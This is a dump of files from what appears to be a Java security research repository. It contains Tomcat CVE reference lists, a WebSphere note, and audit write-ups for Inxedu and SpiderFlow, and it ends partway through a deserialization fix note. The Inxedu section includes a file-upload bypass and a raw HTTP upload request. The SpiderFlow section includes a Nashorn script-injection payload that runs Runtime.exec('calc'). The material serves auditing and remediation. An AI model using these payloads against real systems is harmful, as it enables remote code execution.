--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220105172215180.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220105191416860.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220105191416860.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106131156977.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106131156977.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106132143479.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106132143479.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106132647928.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106132647928.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106132957181.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106132957181.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106142101670.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106142101670.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106142700706.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106142700706.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106144849036.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106144849036.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106144905739.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106144905739.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106144931512.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106144931512.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106150529815.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106150529815.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106162933997.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106162933997.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106164158028.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106164158028.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106164513466.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106164513466.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106171354262.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106171354262.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106172008396.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106172008396.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106172127259.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106172127259.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106173607433.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106173607433.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106174307844.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106174307844.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106174411748.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106174411748.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106180350585.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106180350585.png
--------------------------------------------------------------------------------
/middleware/resin/note/img/image-20220106180420193.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/resin/note/img/image-20220106180420193.png
--------------------------------------------------------------------------------
/middleware/tomcat/Tomcat v5 不同的类加载机制.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/tomcat/Tomcat v5 不同的类加载机制.pdf
--------------------------------------------------------------------------------
/middleware/tomcat/历史漏洞.md:
--------------------------------------------------------------------------------
1 | 历史漏洞
2 | ---
3 | ### CVE-2021-33037 HTTP Request Smuggling
4 |
5 | - https://xz.aliyun.com/t/9866
6 |
7 | ### CVE-2020-9484 Session Deserialization -> RCE
8 |
9 | - https://mp.weixin.qq.com/s/r8Mk1TYJqFIxDk8SkWorrg
10 |
11 | ### CVE-2020-13935 WebSocket DoS
12 |
13 | - https://xz.aliyun.com/t/8550
14 |
15 |
16 | ### CVE-2020-1938 AJP File Read/Inclusion -> RCE
17 |
18 | - https://www.anquanke.com/post/id/199448
19 | - https://xz.aliyun.com/t/7325
20 |
21 | ### CVE-2019-0232 CGI Servlet RCE
22 |
23 | - https://paper.seebug.org/958/
24 |
25 | ### CVE-2019-0221 XSS
26 |
27 | - https://www.exploit-db.com/exploits/50119
28 |
29 |
30 | ### CVE-2018-11784 Open Redirect
31 |
32 | - https://www.exploit-db.com/exploits/50118
33 |
34 | ### CVE-2017-12617 HTTP PUT -> RCE(12615 bypass)
35 |
36 | - https://www.exploit-db.com/exploits/43008
37 |
38 | ### CVE-2017-12615 HTTP PUT -> RCE
39 |
40 | - https://xz.aliyun.com/t/5610
41 |
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/0c70e330d73249549ef58a85486605dc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/0c70e330d73249549ef58a85486605dc.png
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/144720808-7e3efafd-8126-4994-bd78-945e314ff3ac.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/144720808-7e3efafd-8126-4994-bd78-945e314ff3ac.png
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/144720899-5b80c842-e6dd-47c2-b2fc-e3c60ba2a8f5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/144720899-5b80c842-e6dd-47c2-b2fc-e3c60ba2a8f5.png
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/144720974-59cb9fd5-65df-4dae-a9f8-fd103719f499.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/144720974-59cb9fd5-65df-4dae-a9f8-fd103719f499.png
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/200837f4aab74ffa95afcd24e6bbec66.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/200837f4aab74ffa95afcd24e6bbec66.png
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/51de4068ad434fa5968e2f66e4ebe9ff.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/51de4068ad434fa5968e2f66e4ebe9ff.png
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/61aa3d6eed8947c0aab6cd60ecd00314.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/61aa3d6eed8947c0aab6cd60ecd00314.png
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/7e182850a43941d690d6151c8111e0cd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/7e182850a43941d690d6151c8111e0cd.png
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/88ac5abaedd5458490bd9fba189c43e6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/88ac5abaedd5458490bd9fba189c43e6.png
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/image-20211026163346410.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/image-20211026163346410.png
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/image-20211125150525583.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/image-20211125150525583.png
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/image-20211125150550271.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/image-20211125150550271.png
--------------------------------------------------------------------------------
/middleware/weblogic/note/img/img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/weblogic/note/img/img.png
--------------------------------------------------------------------------------
/middleware/websphere/CVE-2020-2550.md:
--------------------------------------------------------------------------------
1 |
2 | ### 环境搭建
3 |
4 | https://blog.csdn.net/qq_34238798/article/details/89373708
5 |
6 |
7 | 远程调试
8 |
9 | 
10 |
11 |
12 |
13 | ### 漏洞复现
14 |
15 | proof of concept
16 |
17 | - https://github.com/silentsignal/WebSphere-WSIF-gadget
18 |
19 | 
20 |
21 |
22 |
23 | ### 漏洞分析
24 |
25 | 网上已经有很多优秀的分析了
26 |
27 | - https://iswin.org/2020/08/04/WebSphere-CVE-2020-4450-Vul-Analysis/
28 | - https://www.freebuf.com/vuls/246928.html
29 |
--------------------------------------------------------------------------------
/middleware/wildfly/note/img/image-20211230142344888.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/wildfly/note/img/image-20211230142344888.png
--------------------------------------------------------------------------------
/middleware/wildfly/note/img/image-20211230142523946.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/wildfly/note/img/image-20211230142523946.png
--------------------------------------------------------------------------------
/middleware/wildfly/note/img/image-20211230142904408.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/wildfly/note/img/image-20211230142904408.png
--------------------------------------------------------------------------------
/middleware/wildfly/note/img/image-20211230161228102.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/wildfly/note/img/image-20211230161228102.png
--------------------------------------------------------------------------------
/middleware/wildfly/note/img/image-20211230174050842.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/wildfly/note/img/image-20211230174050842.png
--------------------------------------------------------------------------------
/middleware/wildfly/note/img/image-20211230181606604.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/middleware/wildfly/note/img/image-20211230181606604.png
--------------------------------------------------------------------------------
/other/alibaba/sentinel/README.md:
--------------------------------------------------------------------------------
1 | 基本信息
2 | ---
3 |
4 | 相关漏洞
5 | ---
6 | ### SSRF
7 | https://mp.weixin.qq.com/s/9KsHHvTSlsNiAAxo-QQX1w
8 |
--------------------------------------------------------------------------------
/other/crafter cms/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### SSTI
5 |
6 | - craftercms/craftercms#2677
7 |
8 |
--------------------------------------------------------------------------------
/other/datagear/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### 文件读取
5 |
6 | - datageartech/datagear#13
7 |
8 |
--------------------------------------------------------------------------------
/other/inxedu/2021_08_05_Inxedu.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/inxedu/2021_08_05_Inxedu.pdf
--------------------------------------------------------------------------------
/other/inxedu/README.md:
--------------------------------------------------------------------------------
1 | ### 相关漏洞
2 |
3 | #### 任意文件上传
4 |
5 | \src\main\java\com\inxedu\os\common\controller\VideoUploadController.java
6 |
7 | ```java
8 | /**
9 | * 视频上传
10 | */
11 | @RequestMapping(value="/uploadvideo",method={RequestMethod.POST})
12 | public String gok4(HttpServletRequest request,HttpServletResponse response,@RequestParam(value="uploadfile" ,required=true) MultipartFile uploadfile,
13 | @RequestParam(value="param",required=false) String param,
14 | @RequestParam(value="fileType",required=true) String fileType){
15 | try{
16 |
17 | String[] type = fileType.split(",");
18 | //设置图片类型
19 | setFileTypeList(type);
20 | //获取上传文件类型的扩展名,先得到.的位置,再截取从.的下一个位置到文件的最后,最后得到扩展名
21 | String ext = FileUploadUtils.getSuffix(uploadfile.getOriginalFilename());
22 | if(!fileType.contains(ext)){
23 | return responseErrorData(response,1,"文件格式错误,上传失败。");
24 | }
25 | //获取文件路径
26 | String filePath = getPath(request,ext,param);
27 | File file = new File(getProjectRootDirPath(request)+filePath);
28 |
29 | //如果目录不存在,则创建
30 | if(!file.getParentFile().exists()){
31 | file.getParentFile().mkdirs();
32 | }
33 | //保存文件
34 | uploadfile.transferTo(file);
35 | //返回数据
36 |
37 | return responseData(filePath,0,"上传成功",response);
38 | }catch (Exception e) {
39 | logger.error("gok4()--error",e);
40 | return responseErrorData(response,2,"系统繁忙,上传失败");
41 | }
42 | }
43 | ```
44 |
45 | 漏洞点
46 |
47 | ```java
48 | if(!fileType.contains(ext)){...}
49 | ```
50 |
51 | 代码翻译:
52 |
53 | 只要参数filetype中包含上传文件的后缀即可,如:
54 |
55 | - 文件名:xxx.jsp
56 | - filetype: ssfjspssss
57 | - 上传结果:成功
58 |
59 | 如图:
60 |
61 | 
62 |
63 | #### 文件上传(受限)
64 |
65 |
66 |
67 | ```
68 | POST /inxedu_war/image/gok4?fileType=html HTTP/1.1
69 | Host: 127.0.0.1:9999
70 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
71 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
72 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
73 | Accept-Encoding: gzip, deflate
74 | Content-Type: multipart/form-data; boundary=---------------------------37391825482350680435279262019
75 | Content-Length: 260
76 | Origin: http://127.0.0.1:9999
77 | DNT: 1
78 | Connection: close
79 | Referer: http://127.0.0.1:9999/inxedu_war/uc/initUpdateUser/0
80 | Cookie: JSESSIONID=14B18EC87EE756AFDF8DB6D19F7C6CF6; inxeduweb_user_login_=6e32a4cf67f84f339e70c947cd9e65e7
81 | Upgrade-Insecure-Requests: 1
82 |
83 | -----------------------------37391825482350680435279262019
84 | Content-Disposition: form-data; name="uploadfile"; filename="x.html"
85 | Content-Type: image/png
86 |
87 |
88 | -----------------------------37391825482350680435279262019--
89 | ```
90 |
91 |
92 |
93 |
94 |
95 | 
96 |
97 |
--------------------------------------------------------------------------------
/other/inxedu/img/1625345482403.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/inxedu/img/1625345482403.png
--------------------------------------------------------------------------------
/other/inxedu/img/1625380728348.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/inxedu/img/1625380728348.png
--------------------------------------------------------------------------------
/other/jeecms/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### SSRF + SSTI + Shiro 反序列化
5 |
6 | - http://www.yulegeyu.com/2019/02/15/Some-vulnerabilities-in-JEECMSV9/
7 |
8 |
--------------------------------------------------------------------------------
/other/metersphere/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | ---
3 |
4 | ### PluginController Pre-auth RCE
5 |
6 | - https://mp.weixin.qq.com/s/MLZrwHlqjUbF_KMHAxzggw
7 |
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 1.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 10.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 11.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 12.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 13.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 14.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 15.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 16.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 17.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 18.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 18.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 19.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 2.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 20.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 21.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 21.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 22.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 22.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 23.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 23.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 24.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 24.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 25.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 25.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 26.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 26.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 27.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 27.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 28-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 28-1.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 3.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 4.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 5.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 7.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 8.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled 9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled 9.png
--------------------------------------------------------------------------------
/other/ofcms/img/Untitled.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/ofcms/img/Untitled.png
--------------------------------------------------------------------------------
/other/spider flow/README.md:
--------------------------------------------------------------------------------
1 | ### SpiderFlow RCE via Nashorn
2 |
3 | #### 前置知识
4 |
5 | — Nashorn是什么?怎么用?
6 |
7 | ##### What
8 |
9 | Nashorn是于Java 8中用于取代Rhino(Java 6,Java 7)的JavaScript引擎。
10 |
11 | ##### How
12 |
13 | > 实现如何用Nashorn在Java中执行JS代码即可
14 |
15 | 
16 |
17 | 测试效果
18 |
19 | 
20 |
21 | ##### RCE
22 |
23 | Nashorn定义了一个称为Java的新的全局对象,它包含许多有用的函数来使用Java包和类。
24 |
25 | Java对象的` type()`函数将Java类型导入脚本中。
26 |
27 | 示例
28 |
29 | 
30 |
31 | 那么如何弹计算器的呢?
32 |
33 | 示例
34 |
35 | ```java
36 | package org.spiderflow.demo;
37 |
38 | import javax.script.ScriptEngine;
39 | import javax.script.ScriptEngineManager;
40 | class JsFromJava{
41 | public static void main(String args[]) throws Exception {
42 | String evilJs="var RCETest= Java.type(\"java.lang\"+\".Runtime\"); var rt = RCETest.getRuntime(); rt.exec(\"calc\");";
43 | ScriptEngineManager manager = new ScriptEngineManager(null);
44 | ScriptEngine engine = manager.getEngineByName("nashorn");
45 | engine.eval(evilJs);
46 | }
47 | }
48 | ```
49 |
50 | 
51 |
52 | #### 审计思路
53 |
54 | 有了上面的测试,审计这类漏洞尝试搜索`.eval(`等关键字即可,然后再看看源码是否实现`jdk.nashorn.api.scripting.ClassFilter`进行了过滤。
55 |
56 | #### 漏洞复现
57 |
58 | - 全局搜索`.eval(`
59 |
60 | 
61 |
62 | - 跟进
63 |
64 | - org.spiderflow.core.script.ScriptManager#registerFunction
65 |
66 | 
67 |
68 | - org.spiderflow.core.script.ScriptManager#concatScript
69 |
70 | 
71 |
72 | - 构造payload,闭合一下
73 |
74 | ```js
75 | # function+functionName+(+parameters+)+{+script+}
76 | functionName: rce
77 | parameters: demo
78 | script: }Java.type("java.lang.Runtime").getRuntime().exec('calc');{
79 | # function rce(){demo}Java.type("java.lang.Runtime").getRuntime().exec('calc');{}
80 | ```
81 |
82 | 复现效果:
83 |
84 | 
85 |
86 |
87 |
--------------------------------------------------------------------------------
/other/spider flow/img/image-20220102181550828.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/spider flow/img/image-20220102181550828.png
--------------------------------------------------------------------------------
/other/spider flow/img/image-20220102181612329.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/spider flow/img/image-20220102181612329.png
--------------------------------------------------------------------------------
/other/spider flow/img/image-20220102182241321.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/spider flow/img/image-20220102182241321.png
--------------------------------------------------------------------------------
/other/spider flow/img/image-20220102182630383.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/spider flow/img/image-20220102182630383.png
--------------------------------------------------------------------------------
/other/spider flow/img/image-20220102183719108.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/spider flow/img/image-20220102183719108.png
--------------------------------------------------------------------------------
/other/spider flow/img/image-20220102184309834.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/spider flow/img/image-20220102184309834.png
--------------------------------------------------------------------------------
/other/spider flow/img/image-20220102184652005.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/spider flow/img/image-20220102184652005.png
--------------------------------------------------------------------------------
/other/spider flow/img/image-20220102191038717.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/other/spider flow/img/image-20220102191038717.png
--------------------------------------------------------------------------------
/修复方案/README.md:
--------------------------------------------------------------------------------
1 | > 记录漏洞复现过程中遇到的各种漏洞的修复方案
2 |
--------------------------------------------------------------------------------
/修复方案/反序列化/readObject.md:
--------------------------------------------------------------------------------
1 |
2 | ### 01 ValidatingObjectInputStream(commons-io.jar)
3 |
4 | commons-io.jar 的 ValidatingObjectInputStream 类提供了 accept/reject 方法来控制允许反序列化/不允许反序列化的类, 以达到黑/白名单的效果。
5 |
6 |
7 | 案例: GoAnywhere MFT (CVE-2023-0669)
8 |
9 | 修复前
10 | ```java
11 | private static byte[] verify(byte[] paramArrayOfByte, KeyConfig paramKeyConfig) throws IOException, ClassNotFoundException, NoSuchAlgorithmException, InvalidKeyException, SignatureException, UnrecoverableKeyException, CertificateException, KeyStoreException {
12 | objectInputStream = null;
13 | try {
14 | String str = "SHA1withDSA";
15 | if ("2".equals(paramKeyConfig.getVersion())) {
16 | str = "SHA512withRSA";
17 | }
18 | PublicKey publicKey = getPublicKey(paramKeyConfig);
